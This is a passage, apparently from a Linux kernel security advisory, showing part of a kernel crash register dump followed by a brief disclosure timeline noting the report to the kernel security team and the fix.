ffff978253453000 RCX: 0000001088064d8d [69803.515556] RDX: 0000001088064d8c RSI: 00000000ffffffff RDI: ffffffffc0c39250 [69803.515559] RBP: ffffa52bc1cabe08 R08: ffff97825fcb7a80 R09: ffff9781266c7400 [69803.515562] R10: 0000000000000008 R11: ffff9781241310c0 R12: 00000000000003ff [69803.515566] R13: ffffffffc0c437c0 R14: ffff9782599eef20 R15: ffff9781870a3240 [69803.515570] FS: 00000000010bc300(0000) GS:ffff97825fc80000(0000) knlGS:0000000000000000 [69803.515573] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [69803.515576] CR2: 00007ffe67758020 CR3: 0000000f1d490004 CR4: 00000000003606e0 [69803.515579] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [69803.515582] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
]]>10/07/2022 - The bug was reported to security@kernel.org
11/07/2022 - The fix was commited by Linus Torvalds and Matthew Wilcox.